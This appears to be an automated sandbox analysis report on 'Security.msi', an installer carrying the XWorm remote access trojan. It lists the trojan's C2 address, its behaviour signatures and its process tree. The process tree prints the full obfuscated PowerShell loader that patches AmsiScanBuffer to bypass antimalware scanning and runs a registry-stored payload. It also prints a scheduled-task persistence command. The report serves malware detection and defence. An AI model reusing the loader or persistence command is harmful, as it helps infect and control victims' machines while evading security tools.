Resubmissions

31/03/2025, 15:18

250331-spmg9svnx6 1

31/03/2025, 15:14

250331-smb9hsswbz 10

Analysis

  • max time kernel
    150s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31/03/2025, 15:14

General

  • Target

    Security.msi

  • Size

    444KB

  • MD5

    2a483b7d8f9f70e6abb6a6b5193bfdbf

  • SHA1

    10ce8a8d4ef944ba2ff5d101c9c34a597012f182

  • SHA256

    f9b1b482d5eaf4ae4892fe8a5af1e66f5ace1f3f582e1638b68494867b326521

  • SHA512

    733ec6b41f7d98f5df6a33c3cb2eed93df846a3c2ed8082d073277a3d7e1b54d75c091bc57f48958265d57caec0e292075218277b85a1601f22584e9179748e3

  • SSDEEP

    12288:8tVRQ+gjpjegDro86la3QNTcw2gWOj36:8t9cpVDh6WQNYxz

Malware Config

Extracted

Family

xworm

Version

3.1

C2

respect-hits.gl.at.ply.gg:53989

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Modifies file permissions 1 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 13 IoCs
  • Drops file in Windows directory 11 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 56 IoCs
  • Modifies registry class 8 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:608
    • C:\Windows\system32\dwm.exe
      "dwm.exe"
      2⤵
        PID:1016
    • C:\Windows\system32\lsass.exe
      C:\Windows\system32\lsass.exe
      1⤵
        PID:668
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:952
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:512
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:988
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
              1⤵
                PID:1104
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                1⤵
                • Drops file in System32 directory
                PID:1128
                • C:\Windows\system32\taskhostw.exe
                  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                  2⤵
                    PID:2924
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YPeWjvzWtBCp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ReByfKOIDunNsG,[Parameter(Position=1)][Type]$lzLRvkNDaK)$YTOIUrrzQrQ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+''+'l'+''+[Char](101)+''+'c'+'te'+'d'+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+'Me'+[Char](109)+'or'+[Char](121)+''+[Char](77)+'o'+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+'t'+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+'l'+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+'d'+','+'A'+'n'+''+'s'+''+'i'+''+'C'+''+'l'+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+'o'+'C'+''+[Char](108)+''+[Char](97)+'ss',[MulticastDelegate]);$YTOIUrrzQrQ.DefineConstructor(''+[Char](82)+'TS'+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+'a'+''+'l'+'Name'+','+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+'Si'+[Char](103)+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$ReByfKOIDunNsG).SetImplementationFlags('R'+'u'+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$YTOIUrrzQrQ.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+'k'+[Char](101)+'',''+[Char](80)+'ub'+[Char](108)+'ic'+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+'B'+[Char](121)+''+'S'+'i'+[Char](103)+''+','+''+'N'+'ew'+'S'+'l'+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+'l',$lzLRvkNDaK,$ReByfKOIDunNsG).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+'i'+''+'m'+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $YTOIUrrzQrQ.CreateType();}$KbwxTBCxrscHk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+'d'+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+'i'+'n'+'3'+''+[Char](50)+''+'.'+''+[Char](85)+'ns'+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+'i'+'ve'+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$BXHxbcdOYHAnDU=$KbwxTBCxrscHk.GetMethod(''+'G'+''+[Char](101)+''+'t'+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+'d'+''+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+''+[Char](97)+'t'+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$omKmHzjfEzpMZTSFPhi=YPeWjvzWtBCp @([String])([IntPtr]);$WfYHuFiAoqbhHmayFCpqXJ=YPeWjvzWtBCp @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zjnRylCAQfI=$KbwxTBCxrscHk.GetMethod(''+[Char](71)+'e'+[Char](116)+''+'M'+'od'+[Char](117)+''+'l'+''+'e'+''+[Char](72)+''+'a'+''+'n'+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+''+[Char](110)+''+'e'+'l3'+[Char](50)+''+[Char](46)+''+'d'+'l'+[Char](108)+'')));$BLQqVJgXuuzJhY=$BXHxbcdOYHAnDU.Invoke($Null,@([Object]$zjnRylCAQfI,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+'yA')));$bMRxAlKJZKYVRkPHR=$BXHxbcdOYHAnDU.Invoke($Null,@([Object]$zjnRylCAQfI,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+''+'a'+''+'l'+'Pr'+[Char](111)+'t'+[Char](101)+''+'c'+''+[Char](116)+'')));$LCxOnNj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BLQqVJgXuuzJhY,$omKmHzjfEzpMZTSFPhi).Invoke('am'+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$tOEJdzkAwqTgLZAKi=$BXHxbcdOYHAnDU.Invoke($Null,@([Object]$LCxOnNj,[Object]('A'+'m'+'s'+[Char](105)+''+[Char](83)+''+'c'+''+'a'+'n'+[Char](66)+''+[Char](117)+'f'+[Char](102)+''+'e'+'r')));$ibkarGkiZR=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bMRxAlKJZKYVRkPHR,$WfYHuFiAoqbhHmayFCpqXJ).Invoke($tOEJdzkAwqTgLZAKi,[uint32]8,4,[ref]$ibkarGkiZR);[Runtime.InteropServices.Marshal]::Copy([Byte[]]([Byte](204-73),[Byte](88+146),[Byte](4-4),[Byte](57+127),[Byte](207-120),[Byte](94-94),[Byte](128-121),[Byte](79+49),[Byte](204-73),[Byte](250-15),[Byte](157-157),[Byte](174+21),[Byte](29+108),[Byte](55+164)),0,$tOEJdzkAwqTgLZAKi,208-194);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bMRxAlKJZKYVRkPHR,$WfYHuFiAoqbhHmayFCpqXJ).Invoke($tOEJdzkAwqTgLZAKi,[uint32]8,0x20,[ref]$ibkarGkiZR);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+'T'+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+'s'+''+[Char](116)+''+[Char](97)+'ge'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:5700
                  • C:\Users\Admin\AppData\Roaming\$77.exe
                    C:\Users\Admin\AppData\Roaming\$77.exe
                    2⤵
                    • Executes dropped EXE
                    PID:1080
                  • C:\Users\Admin\AppData\Roaming\$77.exe
                    C:\Users\Admin\AppData\Roaming\$77.exe
                    2⤵
                    • Executes dropped EXE
                    PID:1252
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  1⤵
                    PID:1136
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                    1⤵
                      PID:1148
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                      1⤵
                        PID:1260
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                        1⤵
                          PID:1276
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1296
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                            1⤵
                              PID:1340
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1420
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:2616
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1556
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1564
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                      1⤵
                                        PID:1588
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                        1⤵
                                          PID:1672
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1720
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1760
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1916
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                1⤵
                                                  PID:1932
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:1940
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1072
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:1860
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:1988
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2108
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2176
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2356
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2460
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2464
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                    1⤵
                                                                      PID:2668
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      PID:2688
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2764
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2788
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                          1⤵
                                                                            PID:2796
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2804
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:3040
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                1⤵
                                                                                  PID:2232
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                  1⤵
                                                                                    PID:3320
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of UnmapMainImage
                                                                                    PID:3412
                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                      msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Security.msi
                                                                                      2⤵
                                                                                      • Enumerates connected drives
                                                                                      • Event Triggered Execution: Installer Packages
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      PID:4264
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\$77.exe
                                                                                      2⤵
                                                                                        PID:464
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          3⤵
                                                                                            PID:5832
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                        1⤵
                                                                                          PID:3520
                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                          1⤵
                                                                                            PID:3720
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:3876
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                              PID:4112
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                              1⤵
                                                                                                PID:4532
                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:5692
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                  1⤵
                                                                                                    PID:5500
                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                    C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                    1⤵
                                                                                                      PID:5812
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                      1⤵
                                                                                                        PID:1044
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                        1⤵
                                                                                                          PID:1520
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                          1⤵
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:1184
                                                                                                        • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                          "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                          1⤵
                                                                                                          • Drops file in System32 directory
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:2784
                                                                                                        • C:\Windows\system32\SppExtComObj.exe
                                                                                                          C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:4020
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                            1⤵
                                                                                                              PID:1884
                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                              1⤵
                                                                                                                PID:5244
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                1⤵
                                                                                                                  PID:5248
                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                  1⤵
                                                                                                                  • Enumerates connected drives
                                                                                                                  • Drops file in Windows directory
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:808
                                                                                                                  • C:\Windows\system32\srtasks.exe
                                                                                                                    C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                                                                                                                    2⤵
                                                                                                                      PID:3660
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        3⤵
                                                                                                                          PID:3732
                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding A041A4D9F48F86345952C3451DC10DC5
                                                                                                                        2⤵
                                                                                                                        • Loads dropped DLL
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:4088
                                                                                                                        • C:\Windows\SysWOW64\ICACLS.EXE
                                                                                                                          "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-682dddb5-14d1-47f1-8257-c0045bf994df\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
                                                                                                                          3⤵
                                                                                                                          • Modifies file permissions
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:6096
                                                                                                                        • C:\Windows\SysWOW64\EXPAND.EXE
                                                                                                                          "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
                                                                                                                          3⤵
                                                                                                                          • Drops file in Windows directory
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:5176
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\MW-682dddb5-14d1-47f1-8257-c0045bf994df\files\Security.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\MW-682dddb5-14d1-47f1-8257-c0045bf994df\files\Security.exe"
                                                                                                                          3⤵
                                                                                                                          • Checks computer location settings
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                          PID:1644
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                                                                                                            4⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:4644
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\$77.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\$77.exe"
                                                                                                                            4⤵
                                                                                                                            • Adds Run key to start application
                                                                                                                            • Checks computer location settings
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:1292
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              "C:\Windows\SysWOW64\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77" /tr "C:\Users\Admin\AppData\Roaming\$77.exe"
                                                                                                                              5⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                              PID:3772
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                6⤵
                                                                                                                                  PID:4292
                                                                                                                          • C:\Windows\SysWOW64\ICACLS.EXE
                                                                                                                            "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-682dddb5-14d1-47f1-8257-c0045bf994df\." /SETINTEGRITYLEVEL (CI)(OI)LOW
                                                                                                                            3⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:3804
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                        1⤵
                                                                                                                          PID:4032
                                                                                                                        • C:\Windows\system32\vssvc.exe
                                                                                                                          C:\Windows\system32\vssvc.exe
                                                                                                                          1⤵
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:368
                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                          C:\Windows\System32\svchost.exe -k swprv
                                                                                                                          1⤵
                                                                                                                            PID:212
                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                            1⤵
                                                                                                                              PID:4648
                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                              1⤵
                                                                                                                              • Modifies registry class
                                                                                                                              PID:1596
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                              1⤵
                                                                                                                                PID:4792
                                                                                                                              • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                1⤵
                                                                                                                                • Checks BIOS information in registry
                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                • Enumerates system info in registry
                                                                                                                                PID:4368
                                                                                                                              • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                1⤵
                                                                                                                                  PID:4568
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                  1⤵
                                                                                                                                    PID:6012
                                                                                                                                  • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                    C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                    • Checks processor information in registry
                                                                                                                                    • Enumerates system info in registry
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:5768
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
                                                                                                                                    1⤵
                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    PID:388
                                                                                                                                  • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                                    C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:3572
                                                                                                                                    • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                      "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                      1⤵
                                                                                                                                        PID:5648

                                                                                                                                      Network

                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                      Replay Monitor

                                                                                                                                      Loading Replay Monitor...

                                                                                                                                      Downloads

                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77.exe.log

                                                                                                                                        Filesize

                                                                                                                                        654B

                                                                                                                                        MD5

                                                                                                                                        2ff39f6c7249774be85fd60a8f9a245e

                                                                                                                                        SHA1

                                                                                                                                        684ff36b31aedc1e587c8496c02722c6698c1c4e

                                                                                                                                        SHA256

